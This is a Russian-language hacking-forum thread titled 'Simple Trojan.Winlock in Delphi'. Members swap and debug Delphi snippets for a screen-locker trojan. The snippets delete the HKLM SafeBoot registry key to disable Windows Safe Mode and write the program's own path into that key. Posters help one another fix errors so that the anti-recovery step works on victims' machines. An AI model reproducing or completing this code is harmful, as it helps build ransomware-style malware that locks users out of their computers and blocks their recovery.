Простенький Trojan.Winlock на делфи

[BioNIX]

X-Shar, Как это нет Безопасного режима в 8-ке, вводишь команду msconfig в командной строке и включаешь его, чтоб отключить безопасный режим, набираешь эту же команду и снимаешь галочку.

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[X-Shar]

Вот так должна удаляться ветка с Save Mode?Она не хочет удаляется или неправильно что-то сделано.

Эх давно я не кодил в делфи, после инста не открывал, уже три года прошло, попробуй так:

Скопировать в буфер обмена

   reg.RootKey:=HKEY_LOCAL_MACHINE;
   reg.DeleteKey('HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot');
   reg.Free;

Т.е. reg.lazywrite := false; лишнее и хрен знает, что делает, ну и у тебя удаление ветки идёт при создании формы, лучше для теста вынисе её в отдельный обработчик пока, т.е. по нажатию кнопки делать удаление, а потом если работает уже попробовать в FormCreate сделать !

 

[BLONDY HACKER]

А в 8-ке нет безопасного режима, потести в 8-ке, интересно как работать будет !

естья где-то на форуме выкладывала тему, как зайти в безопасный режим на 8-ке

 

[Антоха]

Олег,почему-то выдаёт ошибки(после нажатия кнопки).В чём причина? (я потом удалю весь этот загруженный хлам)

Скопировать в буфер обмена

unit Unit1;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Registry;
 
type
  TForm1 = class(TForm)
	btn1: TButton;
	procedure btn1Click(Sender: TObject);
  private
	{ Private declarations }
  public
	{ Public declarations }
  end;
 
var
  Form1: TForm1;
 
implementation
 
{$R *.dfm}
 
procedure TForm1.btn1Click(Sender: TObject);
  var reg: Tregistry;
begin
  reg.RootKey:=HKEY_LOCAL_MACHINE;
  reg.DeleteKey('HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot');
  reg.Free;
end;
 
end.

Пароль:111

 

[X-Shar]

Олег,почему-то выдаёт ошибки(после нажатия кнопки).В чём причина? (я потом удалю весь этот загруженный хлам)

Что-то там с памятью, типо обращается не туда, видимо всё-же reg.lazywrite := false; наверное нужно.

Определяет возможность отложенной записи изменений реестра на диск если True, и немедленная запись если False.

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[Антоха]

Сейчас испробуем.С этим куском reg.lazywrite := false; у другого чела всё работало,правда он удалял другой ключ реестра.

 

[X-Shar]

Сейчас испробуем.С этим куском reg.lazywrite := false; у другого чела всё работало,правда он удалял другой ключ реестра.

Ну да с этим куском должно работать !

А переименование, вот так 100% рабочее:

Скопировать в буфер обмена

reg := tregistry.create;
reg.rootkey:=hkey_local_machine;
reg.openkey('CurrentControlSet\Control\SafeBoot',false);
reg.writestring('mscv32', application. exename);
reg.closekey;
reg.free;

Ну либо добавить reg.lazywrite := false; после reg.rootkey:=hkey_local_machine;

 

[X-Shar]

Сейчас испробуем.С этим куском reg.lazywrite := false; у другого чела всё работало,правда он удалял другой ключ реестра.

Антоха, что-то ты меня заинтриговал, поставлю делфи, посмотрю что там, только на хрюши...

 

[Антоха]

Ну да с этим куском должно работать !

А переименование, вот так 100% рабочее:

Скопировать в буфер обмена

reg := tregistry.create;
reg.rootkey:=hkey_local_machine;
reg.openkey('CurrentControlSet\Control\SafeBoot',false);
reg.writestring('mscv32', application. exename);
reg.closekey;
reg.free;

Ну либо добавить reg.lazywrite := false; после reg.rootkey:=hkey_local_machine;

Что-то нифига не получается или где-то недописал.Вот ошибку выдаёт.Тут куда надо было прописывать путь?
reg.writestring('mscv32', application. exename);

 

[BioNIX]

type TForm1 = class(TForm) btn1: TButton; procedure btn1Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1;

Мне что то тут не нравится обращение какое то, или ошибаюсь, Обращение к TForm1=class(TForm) и последнее значение var